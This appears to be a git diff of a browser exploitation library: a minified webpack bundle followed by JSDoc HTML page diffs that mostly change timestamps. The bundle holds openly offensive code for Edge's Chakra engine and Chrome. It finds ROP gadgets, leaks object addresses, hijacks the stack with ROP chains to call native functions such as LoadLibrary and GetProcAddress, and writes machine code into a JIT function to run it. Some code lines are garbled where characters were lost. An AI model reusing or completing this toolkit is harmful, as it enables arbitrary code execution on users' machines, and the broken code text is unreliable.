l+=(f+=s+(65535&t.low))>>>16,g+=(l+=n+u)>>>16,c+=(g+=e+h)>>>16,c+=r+o,a((l&=65535)<<16|(f&=65535),(c&=65535)<<16|(g&=65535),this.unsigned,this.size)},E.subtract=function(t){return i(t)||(t=d(t)),this.add(t.neg())},E.sub=E.subtract,E.multiply=function(t){if(this.isZero())return f;if(i(t)||(t=d(t)),t.isZero())return f;if(this.eq(P))return t.isOdd()?P:f;if(t.eq(P))return this.isOdd()?P:f;if(this.isNegative())return t.isNegative()?this.neg().mul(t.neg()):this.neg().mul(t).neg();if(t.isNegative())return this.mul(t.neg()).neg();if(this.lt(l)&&t.lt(l))return s(this.toNumber()*t.toNumber(),this.unsigned);var r=this.high>>>16,e=65535&this.high,n=this.low>>>16,o=65535&this.low,h=t.high>>>16,u=65535&t.high,c=t.low>>>16,g=65535&t.low,p=0,_=0,y=0,v=0;return y+=(v+=o*g)>>>16,_+=(y+=n*g)>>>16,y&=65535,_+=(y+=o*c)>>>16,p+=(_+=e*g)>>>16,_&=65535,p+=(_+=n*c)>>>16,_&=65535,p+=(_+=o*u)>>>16,p+=r*g+e*c+n*u+o*h,a((y&=65535)<<16|(v&=65535),(p&=65535)<<16|(_&=65535),this.unsigned,this.size)},E.mul=E.multiply,E.divide=function(t){if(i(t)||(t=d(t)),t.isZero())throw Error("division by zero");if(this.isZero())return this.unsigned?p:f;var r,e,n;if(this.unsigned){if(t.unsigned||(t=t.toUnsigned()),t.gt(this))return p;if(t.gt(this.shru(1)))return y;n=p}else{if(this.eq(P))return t.eq(_)||t.eq(v)?P:t.eq(P)?_:(r=this.shr(1).div(t).shl(1)).eq(f)?t.isNegative()?_:v:(e=this.sub(t.mul(r)),n=r.add(e.div(t)));else if(t.eq(P))return this.unsigned?p:f;if(this.isNegative())return t.isNegative()?this.neg().div(t.neg()):this.neg().div(t).neg();if(t.isNegative())return this.div(t.neg()).neg();n=f}for(e=this;e.gte(t);){r=Math.max(1,Math.floor(e.toNumber()/t.toNumber()));for(var a=Math.ceil(Math.log(r)/Math.LN2),h=a<=48?1:o(2,a-48),u=s(r),c=u.mul(t);c.isNegative()||c.gt(e);)c=(u=s(r-=h,this.unsigned)).mul(t);u.isZero()&&(u=_),n=n.add(u),e=e.sub(c)}return n},E.div=E.divide,E.modulo=function(t){return i(t)||(t=d(t)),this.sub(this.div(t).mul(t))},E.mod=E.modulo,E.not=function(){return a(~this.low,~this.high,this.unsigned,this.size)},E.and=function(t){return i(t)||(t=d(t)),a(this.low&t.low,this.high&t.high,this.unsigned,this.size)},E.or=function(t){return i(t)||(t=d(t)),a(this.low|t.low,this.high|t.high,this.unsigned,this.size)},E.xor=function(t){return i(t)||(t=d(t)),a(this.low^t.low,this.high^t.high,this.unsigned,this.size)},E.shiftLeft=function(t){return i(t)&&(t=t.toInt()),0==(t&=63)?this:t<32?a(this.low<>>32-t,this.unsigned,this.size):a(0,this.low<>>t|this.high<<32-t,this.high>>t,this.unsigned,this.size):a(this.high>>t-32,this.high>=0?0:-1,this.unsigned,this.size)},E.shr=E.shiftRight,E.shiftRightUnsigned=function(t){if(i(t)&&(t=t.toInt()),0===(t&=63))return this;var r=this.high;return t<32?a(this.low>>>t|r<<32-t,r>>>t,this.unsigned,this.size):a(32===t?r:r>>>t-32,0,this.unsigned,this.size)},E.shru=E.shiftRightUnsigned,E.toSigned=function(){return this.unsigned?a(this.low,this.high,!1,this.size):this},E.toUnsigned=function(){return this.unsigned?this:a(this.low,this.high,!0,this.size)},E.toBytes=function(t){return t?this.toBytesLE():this.toBytesBE()},E.toBytesLE=function(){var t=this.high,i=this.low;return[255&i,i>>>8&255,i>>>16&255,i>>>24&255,255&t,t>>>8&255,t>>>16&255,t>>>24&255]},E.toBytesBE=function(){var t=this.high,i=this.low;return[t>>>24&255,t>>>16&255,t>>>8&255,255&t,i>>>24&255,i>>>16&255,i>>>8&255,255&i]},t}();i.a=e},function(t,i,r){"use strict";var e=r(0);function n(t){var i=t/8,r=t/8,n={},s=[],a=this;function o(t){for(var i=new Uint8Array(t.length+1),r=0;r>>0&255)!=a&&(h>>>8&255)!=a&&(h>>>16&255)!=a&&(h>>>24&255)!=a){o+=3;continue}}for(var d=0;d=0&&i[d]!=r[o+d]);d++);if(d==s)return r.add(o);o+=d}return null},n.prototype.findGadgets=function(t,i){for(var r=this.Uint8Ptr.cast(t),e=this.Uint32Ptr.cast(r.add(60))[0],n=this.Uint32Ptr.cast(t.add(e))[7],s=new Int32Array(n/4),a=r.address.add(4096),o=4096;o{for(var i=t[0],e=t[1],n=0;;){if((n=d.indexOf(e[0],n))<0)throw"missing gadget "+i;for(var s=1;s=0&&d[n+s]!=e[s]);s++);if(s==e.length)break;n++}u[i]=r.add(n)}),u},i.a=n},function(module,__webpack_exports__,__webpack_require__){"use strict";var __WEBPACK_IMPORTED_MODULE_0_baseexploit__=__webpack_require__(1),__WEBPACK_IMPORTED_MODULE_1_integer__=__webpack_require__(0);function ChakraExploit(){var t=this;__WEBPACK_IMPORTED_MODULE_0_baseexploit__.a.call(this,64),this.Thread=function(i){var r=new Worker(i);r.onmessage=(i=>{if("CHAKRA_EXPLOIT"==i.data){for(var r=t.globalListFirst.load()[t.threadContextStackLimit].sub(49152).add(1048576),e=t.Uint64Ptr.cast(r).add(-1);!new __WEBPACK_IMPORTED_MODULE_1_integer__.a(1094861636,65536).eq(e.load());)if((e=e.add(-1)).address<=r.sub(65536))throw"unable to find canary";var n=t.Uint64Ptr.cast(e[1]);t.Uint64Ptr.cast(e[2])[7]=n}else if(this.onmessage)return this.onmessage(i)}),this.onmessage=null,this.postMessage=r.postMessage.bind(r)}}ChakraExploit.prototype=Object.create(__WEBPACK_IMPORTED_MODULE_0_baseexploit__.a.prototype),ChakraExploit.prototype.constructor=ChakraExploit,ChakraExploit.prototype.initChakra=function(t){this.chakraBase=this.findModuleBase(t);if(this.gadgets=this.findGadgets(this.chakraBase,[["callLoadLibraryExW",[72,139,200,51,210,65,184,0,8,0,0,255,21]],["jmpGetProcAddress",[72,139,193,72,139,73,8,72,133,201,116,11,72,131,196,40,72,255,37]],["nopReturn",[195]],["popRaxReturn",[88,195]],["popRdxReturn",[90,195]],["popRspReturn",[92,195]],["popRbpReturn",[93,195]],["addRsp58Return",[72,131,196,88,195]],["storeRaxAtRdxReturn",[72,137,2,195]],["entrySlice",[139,248,65,131,-1,2]],["amd64CallFunction",[76,139,78,8,76,139,6,72,131,236,32,255]],["linkToBeginningThreadContext",[72,139,196,76,137,64,24,72,137,80,16,72,137,72,8,72,131,-1,-1,0]],["popRcxRdxR8R9Return",[72,139,76,36,8,72,139,84,36,16,76,139,68,36,24,76,139,76,36,32,72,255,224]],["addRsp28Return",[72,131,196,40,195]]]),this.amd64CallFunctionReturnOffset=208==this.gadgets.amd64CallFunction[12]?13:17,97==this.gadgets.linkToBeginningThreadContext[17])this.threadContextPrev=this.gadgets.linkToBeginningThreadContext[18]/8,this.threadContextNext=this.gadgets.linkToBeginningThreadContext[30]/8,this.globalListFirst=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.linkToBeginningThreadContext).add(27).add(this.Int32Ptr.cast(this.gadgets.linkToBeginningThreadContext.add(23))[0]));else{if(161!=this.gadgets.linkToBeginningThreadContext[17])throw"unsupported version";this.threadContextPrev=this.gadgets.linkToBeginningThreadContext[18]/8,this.threadContextNext=this.gadgets.linkToBeginningThreadContext[33]/8,this.globalListFirst=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.linkToBeginningThreadContext).add(30).add(this.Int32Ptr.cast(this.gadgets.linkToBeginningThreadContext.add(26))[0]))}for(var i=this.globalListFirst[0],r=0;49152!=(65535&i[r]);r++);this.threadContextStackLimit=r;i=this.gadgets.callLoadLibraryExW.add(17).add(this.Int32Ptr.cast(this.gadgets.callLoadLibraryExW.add(13)).load());this.LoadLibraryExW=new this.PointerType(this.Uint8Ptr).cast(i).load();i=this.gadgets.jmpGetProcAddress.add(23).add(this.Int32Ptr.cast(this.gadgets.jmpGetProcAddress.add(19)).load());if(this.GetProcAddress=new this.PointerType(this.Uint8Ptr).cast(i).load(),this.findStackTop(),this.locateArray=[{}],this.locateArrayPtr=new this.PointerType(this.Uint64Ptr).cast(this.addressOfSlow(this.locateArray))[5].add(3),!this.addressOfSlow(this.locateArray[0]).address.eq(this.locateArrayPtr[0]))throw"init of addressOf failed!"},ChakraExploit.prototype.addressOf=function(t){return this.locateArray[0]=t,this.locateArrayPtr[0]},ChakraExploit.prototype.addressOfArrayBuffer=function(t){var i=new DataView(t);return this.Uint64Ptr.cast(this.addressOf(i))[7]},ChakraExploit.prototype.findStackTop=function(){if(void 0===this.stackTop){if("undefined"!=typeof WorkerGlobalScope)var t=this.globalListFirst.load()[this.threadContextStackLimit],i=1048576;else t=this.globalListFirst.load()[this.threadContextStackLimit],i=10485760;var r=t.sub(49152).add(i);this.stackTop=r}},ChakraExploit.prototype.addressOfSlow=function(obj){var address;return eval("String.prototype.slice").call("",{valueOf:()=>{for(var t=this.gadgets,i=this.Uint64Ptr.cast(this.stackTop).add(-1);!this.Uint64.cast(t.entrySlice).eq(i.load());)if((i=i.add(-1)).address<=this.stackTop.sub(65536))throw"unable to find entrySlice";for(;!this.Uint64.cast(t.amd64CallFunction).add(this.amd64CallFunctionReturnOffset).eq(i.load());)if((i=i.add(1)).address>=this.stackTop)throw"unable to find amd64CallFunction";for(;!i[0].eq(new __WEBPACK_IMPORTED_MODULE_1_integer__.a(1111638594,65536))||!i[2].eq(new __WEBPACK_IMPORTED_MODULE_1_integer__.a(1094795585,65536));)if((i=i.add(1)).address>=this.stackTop)throw"unable to find canaries";address=this.Uint8Ptr.cast(i[1])}},0,0,0,obj,1111638594,obj,1094795585),address},ChakraExploit.prototype.customInt32Array=function(t){var i=new Int32Array(1),r=this.Uint64Ptr.cast(this.addressOf(i));return r[4]=2147483647,r[7]=t,i},ChakraExploit.prototype.call=function(address,...args){if(args.length>10)throw"too many arguments";var returnValAddr;return eval("String.prototype.slice").call("",{valueOf:()=>{for(var t=this.gadgets,i=this.Uint64.cast(t.amd64CallFunction).add(this.amd64CallFunctionReturnOffset),r=this.Uint64.cast(t.entrySlice),e=this.stackTop.sub(65536),n=this.customInt32Array(e),s=8184;s>=0&&(r.low!=n[2*s]||r.high!=n[2*s+1]);s-=1);if(0==s)throw"unable to find entrySlice";for(;i.low!=n[2*s]||i.high!=n[2*s+1];)if(8192==++s)throw"unable to find amd64CallFunction";var a=(n=this.Uint64Ptr.cast(e.add(8*s))).add(-2);n=n.add(-16384);var o=this.customInt32Array(n);for(s=32;s>=0;s--){o[4096*s/4]}function h(t,i,r){r=r.address?r.address:__WEBPACK_IMPORTED_MODULE_1_integer__.a.fromValue(r),t[2*i+0]=r.low,t[2*i+1]=r.high}h(o,s=4,t.popRaxReturn),h(o,++s,t.addRsp28Return),h(o,++s,t.popRcxRdxR8R9Return),s++,s++,void 0!==args[0]&&h(o,s,args[0]),s++,void 0!==args[1]&&h(o,s,args[1]),s++,void 0!==args[2]&&h(o,s,args[2]),s++,void 0!==args[3]&&h(o,s,args[3]),h(o,++s,t.nopReturn),h(o,++s,address),h(o,++s,t.addRsp58Return),s++,s+=4,void 0!==args[4]&&h(o,s,args[4]),s++,void 0!==args[5]&&h(o,s,args[5]),s++,void 0!==args[6]&&h(o,s,args[6]),s++,void 0!==args[7]&&h(o,s,args[7]),s++,void 0!==args[8]&&h(o,s,args[8]),s++,void 0!==args[9]&&h(o,s,args[9]),s++,void 0!==args[10]&&h(o,s,args[10]),h(o,++s,t.popRdxReturn),h(o,++s,n),h(o,++s,t.storeRaxAtRdxReturn),h(o,++s,t.popRaxReturn),h(o,++s,new __WEBPACK_IMPORTED_MODULE_1_integer__.a(0,262144)),h(o,++s,t.popRbpReturn),h(o,++s,a.load()),h(o,++s,t.popRspReturn),h(o,++s,a.add(2)),s++,a[0]=n,returnValAddr=n}}),returnValAddr[0]},__webpack_exports__.a=ChakraExploit},function(t,i,r){"use strict";Object.defineProperty(i,"__esModule",{value:!0});var e=r(1),n=r(2),s=r(4),a=r(5),o=r(0);r.d(i,"BaseExploit",function(){return e.a}),r.d(i,"ChakraExploit",function(){return n.a}),r.d(i,"ChakraThreadExploit",function(){return s.a}),r.d(i,"ChromeExploit",function(){return a.a}),r.d(i,"Integer",function(){return o.a})},function(module,__webpack_exports__,__webpack_require__){"use strict";var __WEBPACK_IMPORTED_MODULE_0_chakraexploit__=__webpack_require__(2),__WEBPACK_IMPORTED_MODULE_1_integer__=__webpack_require__(0);function ChakraThreadExploit(){__WEBPACK_IMPORTED_MODULE_0_chakraexploit__.a.call(this);var dvManager=new DataView(new ArrayBuffer(4096)),dvWorker=new DataView(new ArrayBuffer(4096));this.dvWorker=dvWorker,this.dvManager=dvManager,eval("String.prototype.slice").call("",{valueOf:function(){for(postMessage("CHAKRA_EXPLOIT");0==dvManager.getInt32(0););}},0,0,0,0,1094861636,dvWorker,dvManager,1094795585);var vtable=new __WEBPACK_IMPORTED_MODULE_1_integer__.a(dvManager.getInt32(0,!0),dvManager.getInt32(4,!0));this.vtable=vtable,this.chakraBase=this.findModuleBase(vtable),this.initChakra(vtable)}ChakraThreadExploit.prototype=Object.create(__WEBPACK_IMPORTED_MODULE_0_chakraexploit__.a.prototype),ChakraThreadExploit.prototype.constructor=ChakraThreadExploit,ChakraThreadExploit.prototype.read=function(t,i){switch(this.dvManager.setInt32(56,t.low,!0),this.dvManager.setInt32(60,t.high,!0),i){case 8:return new __WEBPACK_IMPORTED_MODULE_1_integer__.a(this.dvWorker.getInt8(0,!0),0,!0);case 16:return new __WEBPACK_IMPORTED_MODULE_1_integer__.a(this.dvWorker.getInt16(0,!0),0,!0);case 32:return new __WEBPACK_IMPORTED_MODULE_1_integer__.a(this.dvWorker.getInt32(0,!0),0,!0);case 64:return new __WEBPACK_IMPORTED_MODULE_1_integer__.a(this.dvWorker.getInt32(0,!0),this.dvWorker.getInt32(4,!0),!0)}},ChakraThreadExploit.prototype.write=function(t,i,r){switch(this.dvManager.setInt32(56,t.low,!0),this.dvManager.setInt32(60,t.high,!0),r){case 8:return this.dvWorker.setInt8(0,0|i.low,!0);case 16:return this.dvWorker.setInt16(0,0|i.low,!0);case 32:return this.dvWorker.setInt32(0,0|i.low,!0);case 64:this.dvWorker.setInt32(0,0|i.low,!0),this.dvWorker.setInt32(4,0|i.high,!0)}},__webpack_exports__.a=ChakraThreadExploit},function(t,i,r){"use strict";var e=r(1);r(0);function n(){e.a.call(this,64)}n.prototype=Object.create(e.a.prototype),n.prototype.constructor=n,n.prototype.initChrome=function(t){this.chromeBase=this.findModuleBase(t);for(var i="",r=0;r<1e3;r++)i+="x["+r+"] += "+Math.random()+";\n";this.jitFunction=new Function("x",i);var e=new Array(1e3).fill(0);for(r=0;r<1e4;r++)this.jitFunction(e);this.gadgets=this.findGadgets(this.chromeBase,[["loadLibraryGetProcAddress",[72,141,13,-1,-1,-1,-1,255,21,-1,-1,-1,-1,72,139,248,72,133,192,15,132,-1,-1,-1,-1,72,141,21,-1,-1,-1,-1,72,139,200,255,21,-1,-1,-1,-1]],["mainThreadStack",[72,139,5,-1,-1,-1,-1,72,141,76,36,-1,72,43,193,72,141,29,-1,-1,-1,-1,72,59,5,-1,-1,-1,-1]]]),this.mainThreadStackBase=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.mainThreadStack).add(7).add(this.Int32Ptr.cast(this.gadgets.mainThreadStack.add(3))[0]))[0],this.LoadLibraryW=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.loadLibraryGetProcAddress).add(13).add(this.Int32Ptr.cast(this.gadgets.loadLibraryGetProcAddress.add(9))[0]))[0],this.GetProcAddress=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.loadLibraryGetProcAddress).add(41).add(this.Int32Ptr.cast(this.gadgets.loadLibraryGetProcAddress.add(37))[0]))[0]},n.prototype.addressOf=function(t){var i=[t];return this.Uint64Ptr.cast(this.Uint64Ptr.cast(this.addressOfSlow(i))[2].sub(1))[2].sub(1)},n.prototype.addressOfArrayBuffer=function(t){return this.Uint64Ptr.cast(this.addressOf(t))[4]},n.prototype.addressOfSlow=function(t){var i,r=this.mainThreadStackBase;return t.toString=function(){for(var t=0;t>-4096;t--)if(322507578==r[t-2].high&&322376504==r[t-1].high){i=r[t].sub(1);break}return""},String.prototype.indexOf.call(t,322376504,322507578),i},n.prototype.call=function(t,...i){var r=this;function e(t){return t.high<=32767&&1==(7&t.low)}function n(t,i){return t[0]=72,t[1]=131,t[2]=196,t[3]=i,t.add(4)}function s(t,i){return t[0]=72,t[1]=184,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function a(t,i){return t[0]=72,t[1]=185,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function o(t,i){return t[0]=72,t[1]=186,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function h(t,i){return t[0]=73,t[1]=184,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function d(t,i){return t[0]=73,t[1]=185,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function u(t){return t[0]=80,t.add(1)}var c=this.Uint64Ptr.cast(this.Uint64Ptr.cast(this.addressOf(this.jitFunction))[7].sub(1));if(e(c[0])&&e(c[1])&&e(c[2])&&e(c[3]))var g=this.Uint8Ptr.cast(c).add(96);else g=this.Uint8Ptr.cast(c);var l=this.Uint64Ptr.cast(g.add(512));i.length>4&&1&i.length&&i.push(0);var f=g;f=function(t){return t[0]=85,t[1]=72,t[2]=137,t[3]=229,t[4]=72,t[5]=131,t[6]=228,t[7]=240,t.add(8)}(f=function(t,i){return t[0]=233,r.Int32Ptr.cast(t.add(1))[0]=i,t.add(5)}(f,4096).add(4096));for(var p=i.length-1;p>=0;p--)f=0==p?a(f,i[p]):1==p?o(f,i[p]):2==p?h(f,i[p]):3==p?d(f,i[p]):u(f=s(f,i[p]));return f=function(t){return t[0]=201,t[1]=195,t.add(2)}(f=function(t,i){return t[0]=72,t[1]=163,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}(f=n(f=function(t){return t[0]=255,t[1]=208,t.add(2)}(f=s(f=n(f,-32),t)),32),l)),this.jitFunction(),l[0]},i.a=n}]); \ No newline at end of file diff --git a/docs/BaseExploit.html b/docs/BaseExploit.html index 68c6323..93c2933 100644 --- a/docs/BaseExploit.html +++ b/docs/BaseExploit.html @@ -22,7 +22,7 @@
@@ -248,7 +248,7 @@

Int8Source:
@@ -317,7 +317,7 @@

Int8PtrSource:
@@ -386,7 +386,7 @@

Int16Source:
@@ -455,7 +455,7 @@

Int16PtrSource:
@@ -524,7 +524,7 @@

Int32Source:
@@ -593,7 +593,7 @@

Int32PtrSource:
@@ -662,7 +662,7 @@

Int64Source:
@@ -731,7 +731,7 @@

Int64PtrSource:
@@ -800,7 +800,7 @@

Uint8Source:
@@ -869,7 +869,7 @@

Uint8PtrSource:
@@ -938,7 +938,7 @@

Uint16Source:
@@ -1007,7 +1007,7 @@

Uint16PtrSource:
@@ -1076,7 +1076,7 @@

Uint32Source:
@@ -1145,7 +1145,7 @@

Uint32PtrSource:
@@ -1214,7 +1214,7 @@

Uint64Source:
@@ -1283,7 +1283,7 @@

Uint64PtrSource:
@@ -1362,7 +1362,7 @@

findGadget<
Source:
@@ -1539,7 +1539,7 @@

findGadget
Source:
@@ -1716,7 +1716,7 @@

findMod
Source:
@@ -1867,7 +1867,7 @@

importF
Source:
@@ -2065,7 +2065,7 @@

Returns:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_ArrayType.html b/docs/BaseExploit_ArrayType.html index a4cac80..9b100fe 100644 --- a/docs/BaseExploit_ArrayType.html +++ b/docs/BaseExploit_ArrayType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new ArrayTyp
Source:
@@ -249,7 +249,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_CString.html b/docs/BaseExploit_CString.html index a12802f..90054a8 100644 --- a/docs/BaseExploit_CString.html +++ b/docs/BaseExploit_CString.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new CStringSource:
@@ -226,7 +226,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_FunctionType.html b/docs/BaseExploit_FunctionType.html index 2c5555e..22f884d 100644 --- a/docs/BaseExploit_FunctionType.html +++ b/docs/BaseExploit_FunctionType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Funct
Source:
@@ -229,7 +229,7 @@

castSource:
@@ -384,7 +384,7 @@
Returns:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_IntType.html b/docs/BaseExploit_IntType.html index 0b98e27..484b127 100644 --- a/docs/BaseExploit_IntType.html +++ b/docs/BaseExploit_IntType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new IntTypeSource:
@@ -249,7 +249,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_Pointer.html b/docs/BaseExploit_Pointer.html index 0110571..a6364ff 100644 --- a/docs/BaseExploit_Pointer.html +++ b/docs/BaseExploit_Pointer.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new PointerSource:
@@ -241,7 +241,7 @@

addSource:
@@ -395,7 +395,7 @@

isNullSource:
@@ -497,7 +497,7 @@

loadSource:
@@ -602,7 +602,7 @@

storeSource:
@@ -738,7 +738,7 @@

toStringSource:
@@ -841,7 +841,7 @@
Returns:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_PointerType.html b/docs/BaseExploit_PointerType.html index 2642653..01f2387 100644 --- a/docs/BaseExploit_PointerType.html +++ b/docs/BaseExploit_PointerType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Pointe
Source:
@@ -229,7 +229,7 @@

castSource:
@@ -384,7 +384,7 @@
Returns:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_StructPointer.html b/docs/BaseExploit_StructPointer.html index d7c8e28..7d76a02 100644 --- a/docs/BaseExploit_StructPointer.html +++ b/docs/BaseExploit_StructPointer.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Stru
Source:
@@ -238,7 +238,7 @@

Parameters:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_StructType.html b/docs/BaseExploit_StructType.html index e6ea009..61bb10b 100644 --- a/docs/BaseExploit_StructType.html +++ b/docs/BaseExploit_StructType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new StructT
Source:
@@ -269,7 +269,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_Type.html b/docs/BaseExploit_Type.html index 3e9367a..5cbafcc 100644 --- a/docs/BaseExploit_Type.html +++ b/docs/BaseExploit_Type.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new TypeSource:
@@ -163,7 +163,7 @@

PtrSource:
@@ -233,7 +233,7 @@

Ptr
- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_WString.html b/docs/BaseExploit_WString.html index 69ab436..06f5c45 100644 --- a/docs/BaseExploit_WString.html +++ b/docs/BaseExploit_WString.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new WStringSource:
@@ -226,7 +226,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit.html b/docs/ChakraExploit.html index 2df6abc..ff3fa29 100644 --- a/docs/ChakraExploit.html +++ b/docs/ChakraExploit.html @@ -22,7 +22,7 @@
@@ -209,7 +209,7 @@

Int8Source:
@@ -283,7 +283,7 @@

Int8PtrSource:
@@ -357,7 +357,7 @@

Int16Source:
@@ -431,7 +431,7 @@

Int16PtrSource:
@@ -505,7 +505,7 @@

Int32Source:
@@ -579,7 +579,7 @@

Int32PtrSource:
@@ -653,7 +653,7 @@

Int64Source:
@@ -727,7 +727,7 @@

Int64PtrSource:
@@ -801,7 +801,7 @@

Uint8Source:
@@ -875,7 +875,7 @@

Uint8PtrSource:
@@ -949,7 +949,7 @@

Uint16Source:
@@ -1023,7 +1023,7 @@

Uint16PtrSource:
@@ -1097,7 +1097,7 @@

Uint32Source:
@@ -1171,7 +1171,7 @@

Uint32PtrSource:
@@ -1245,7 +1245,7 @@

Uint64Source:
@@ -1319,7 +1319,7 @@

Uint64PtrSource:
@@ -1403,7 +1403,7 @@

addressOfSource:
@@ -1542,7 +1542,7 @@
Returns:
-

addressOfSlow(obj) → {Pointer}

+

addressOfArrayBuffer(ab) → {Pointer}

@@ -1554,7 +1554,7 @@

addressO
Source:
@@ -1594,7 +1594,7 @@

addressO
- Returns the address of a Javascript object. Internal. + Returns the address of ArrayBuffer contents.
@@ -1632,13 +1632,13 @@

Parameters:
- obj + ab -* +ArrayBuffer @@ -1648,7 +1648,7 @@
Parameters:
- Any Javascript object + ArrayBuffer @@ -1693,7 +1693,7 @@
Returns:
-

addressOfString(s) → {Pointer}

+

addressOfSlow(obj) → {Pointer}

@@ -1705,7 +1705,7 @@

addres
Source:
@@ -1745,7 +1745,7 @@

addres
- Returns the address of a string. Points to the string's bytes. + Returns the address of a Javascript object. Internal.
@@ -1783,13 +1783,13 @@

Parameters:
- s + obj -string +* @@ -1799,7 +1799,7 @@
Parameters:
- A Javascript string + Any Javascript object @@ -1856,7 +1856,7 @@

callSource:
@@ -2050,7 +2050,7 @@

findGadget<
Source:
@@ -2232,7 +2232,7 @@

findGadget
Source:
@@ -2414,7 +2414,7 @@

findMod
Source:
@@ -2570,7 +2570,7 @@

importF
Source:
@@ -2909,7 +2909,7 @@

Parameters:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_ArrayType.html b/docs/ChakraExploit_ArrayType.html index 95f1b27..b0765c2 100644 --- a/docs/ChakraExploit_ArrayType.html +++ b/docs/ChakraExploit_ArrayType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new ArrayTyp
Source:
@@ -254,7 +254,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_CString.html b/docs/ChakraExploit_CString.html index 37d06be..779a721 100644 --- a/docs/ChakraExploit_CString.html +++ b/docs/ChakraExploit_CString.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new CStringSource:
@@ -231,7 +231,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_FunctionType.html b/docs/ChakraExploit_FunctionType.html index ea2d679..193aa8d 100644 --- a/docs/ChakraExploit_FunctionType.html +++ b/docs/ChakraExploit_FunctionType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Funct
Source:
@@ -231,7 +231,7 @@

Extends


